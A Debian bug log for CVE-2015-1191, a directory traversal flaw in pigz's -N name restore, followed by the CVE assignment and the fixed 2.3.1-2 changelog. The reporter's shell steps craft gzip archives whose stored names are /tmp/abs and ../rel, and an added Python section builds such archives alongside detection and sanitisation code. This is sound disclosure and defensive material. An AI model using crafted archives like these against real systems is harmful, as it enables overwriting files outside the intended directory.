Debian Bug report logs - #774978
pigz: CVE-2015-1191: directory traversal vulnerability
Reported by: Alexander Cherepanov <cherepan@mccme.ru>
Date: Fri, 9 Jan 2015 16:42:02 UTC
Severity: normal
Tags: security
Found in version pigz/2.3.1-1
Fixed in version pigz/2.3.1-2
Done: Eduard Bloch <blade@debian.org>
Bug is archived. No further changes may be made.
Report forwarded to debian-bugs-dist@lists.debian.org, Eduard Bloch <blade@debian.org>: Bug#774978; Package pigz. (Fri, 09 Jan 2015 16:42:07 GMT)
Acknowledgement sent to Alexander Cherepanov <cherepan@mccme.ru>: New Bug report received and forwarded. Copy sent to Eduard Bloch <blade@debian.org>. (Fri, 09 Jan 2015 16:42:07 GMT)
Message #5 received at submit@bugs.debian.org:
Package: pigz
Version: 2.3.1-1
Tags: security
pigz is susceptible to directory traversal vulnerabilities. While
decompressing a file and restoring the file name, it (unlike gzip) will
happily use absolute and relative paths taken from the input. This can
be exploited by a malicious archive to write files outside the current
directory.
1. Absolute path.
A sample could be prepared in the following way:
$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs
Then check it works:
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ unpigz -N abs.gz
$ ls /tmp/abs
/tmp/abs
2. Relative path with "..".
A sample could be prepared in the following way:
$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel
Then check it works:
$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ unpigz -N rel.gz
$ ls ../rel
../rel
--
Alexander Cherepanov
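The report above patches a stored file name into a gzip member with sed, which only works when the replacement has the same length as the original. The following Python is an added example, not code from the report, from pigz or from gzip: it builds a gzip member whose FNAME header field carries any string, parses the FNAME field back out of a member, flags names that would escape the current directory if used verbatim, and shows the basename-only restore that gzip applies when it honours a stored name. The directory name /srv/unpack/inner, the planned_target helper and the sanitisation rule are assumptions for illustration; the exact logic of the upstream pigz patch referenced in the 2.3.1-2 changelog is not shown on this page.

```python
"""Build, inspect and safely plan the restore of gzip members whose FNAME
field names a path outside the working directory (CVE-2015-1191 pattern).
Constructed example; not code from pigz, gzip or the Debian bug report."""
import gzip
import os
import struct
import zlib

# RFC 1952 FLG bits, in the order their optional fields appear in the header
FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 0x01, 0x02, 0x04, 0x08, 0x10


def build_gzip_with_name(data: bytes, name: str) -> bytes:
    """Return one gzip member carrying an arbitrary string in its FNAME field."""
    # ID1 ID2 CM FLG MTIME(4) XFL OS -> the 10-byte fixed header
    header = struct.pack("<4BIBB", 0x1F, 0x8B, 8, FNAME, 0, 0, 255)
    name_field = name.encode("latin-1") + b"\x00"  # NUL-terminated, stored verbatim
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, no zlib wrapper
    body = comp.compress(data) + comp.flush()
    trailer = struct.pack("<II", zlib.crc32(data) & 0xFFFFFFFF, len(data) & 0xFFFFFFFF)
    return header + name_field + body + trailer


def decompress_payload(blob: bytes) -> bytes:
    """Sanity check that the constructed member is a valid gzip stream."""
    return gzip.decompress(blob)


def stored_name(blob: bytes):
    """Parse the gzip header and return the FNAME string, or None if absent."""
    if blob[:2] != b"\x1f\x8b" or blob[2] != 8:
        raise ValueError("not a gzip member")
    flags = blob[3]
    pos = 10
    if flags & FEXTRA:  # the optional extra field precedes FNAME
        xlen = struct.unpack_from("<H", blob, pos)[0]
        pos += 2 + xlen
    if not flags & FNAME:
        return None
    end = blob.index(b"\x00", pos)
    return blob[pos:end].decode("latin-1")


def is_traversal(name: str) -> bool:
    """True if using the stored name verbatim could leave the current directory."""
    return name.startswith("/") or ".." in name.split("/")


def safe_output_name(name: str) -> str:
    """Keep only the final path component, as gzip does when restoring a name."""
    base = name.rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        raise ValueError("stored name has no usable file component: %r" % name)
    return base


def planned_target(outdir: str, blob: bytes, sanitize: bool):
    """Where a -N style restore would write, and whether that stays inside outdir.

    sanitize=False mirrors the behaviour the report describes (the stored name
    is joined as-is); sanitize=True applies safe_output_name first.
    """
    name = stored_name(blob)
    if name is None:
        raise ValueError("member carries no FNAME")
    if sanitize:
        name = safe_output_name(name)
    outdir = os.path.realpath(outdir)
    # os.path.join discards outdir entirely when name is absolute
    target = os.path.realpath(os.path.join(outdir, name))
    inside = target == outdir or target.startswith(outdir + os.sep)
    return target, inside


if __name__ == "__main__":
    for name in ("/tmp/abs", "../rel", "plain.txt"):
        member = build_gzip_with_name(b"constructed payload\n", name)
        print(repr(stored_name(member)), "traversal:", is_traversal(name),
              "verbatim inside cwd:", planned_target(".", member, False)[1],
              "sanitised inside cwd:", planned_target(".", member, True)[1])
```

The stored_name parser is what a scanner would run over untrusted .gz inputs before any tool that honours -N sees them; the planned_target check is the containment test a restore routine should apply after sanitising, so that a name which still resolves outside the output directory is refused rather than written.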
Information forwarded to debian-bugs-dist@lists.debian.org, Eduard Bloch <blade@debian.org>: Bug#774978; Package pigz. (Sun, 18 Jan 2015 20:33:04 GMT)
Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>: Extra info received and forwarded to list. Copy sent to Eduard Bloch <blade@debian.org>. (Sun, 18 Jan 2015 20:33:04 GMT)
Message #10 received at 774978@bugs.debian.org:
Control: retitle -1 pigz: CVE-2015-1191: directory traversal vulnerability
Hi,
CVE-2015-1191 was assigned for this issue in pigz.
Regards,
Salvatore
Changed Bug title to 'pigz: CVE-2015-1191: directory traversal vulnerability' from 'pigz: directory traversal vulnerability'. Request was from Salvatore Bonaccorso <carnil@debian.org> to 774978-submit@bugs.debian.org. (Sun, 18 Jan 2015 20:33:04 GMT)
Reply sent to Eduard Bloch <blade@debian.org>: You have taken responsibility. (Sun, 18 Jan 2015 23:21:08 GMT)
Notification sent to Alexander Cherepanov <cherepan@mccme.ru>: Bug acknowledged by developer. (Sun, 18 Jan 2015 23:21:08 GMT)
Message #17 received at 774978-close@bugs.debian.org:
Source: pigz
Source-Version: 2.3.1-2
We believe that the bug you reported is fixed in the latest version of
pigz, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 774978@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Eduard Bloch <blade@debian.org> (supplier of updated pigz package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sun, 18 Jan 2015 23:58:51 +0100
Source: pigz
Binary: pigz
Architecture: source
Version: 2.3.1-2
Distribution: unstable
Urgency: high
Maintainer: Eduard Bloch <blade@debian.org>
Changed-By: Eduard Bloch <blade@debian.org>
Description:
pigz - Parallel Implementation of GZip
Closes: 774978
Changes:
pigz (2.3.1-2) unstable; urgency=high
.
* Patch(es) from upstream's SCM to solve handling of target file names with
the -N option (CVE-2015-1191, closes: #774978)
Checksums-Sha1:
5d8b2cde2befd3f50eb2f2b57095c10aa417fb13 1647 pigz_2.3.1-2.dsc
49577b466c87ccfd931e3ab3480406085156ecf0 5180 pigz_2.3.1-2.debian.tar.xz
Checksums-Sha256:
88888e0848d513a55e8ec22d03cf6747f271010019c03dad71160a35a2ee7d5f 1647 pigz_2.3.1-2.dsc
edcbc59e062416e2307bef52b88a914261b99b2497ffc1ac9cd606f310c9b02a 5180 pigz_2.3.1-2.debian.tar.xz
Files:
8eb78b4d666b26e8801a44104694218e 1647 utils extra pigz_2.3.1-2.dsc
ef4c4fab3d625f5b2ee7933bd5557e36 5180 utils extra pigz_2.3.1-2.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

=IEco
-----END PGP SIGNATURE-----
Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 23 Feb 2015 07:30:15 GMT)
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified: Wed Jun 19 18:15:00 2019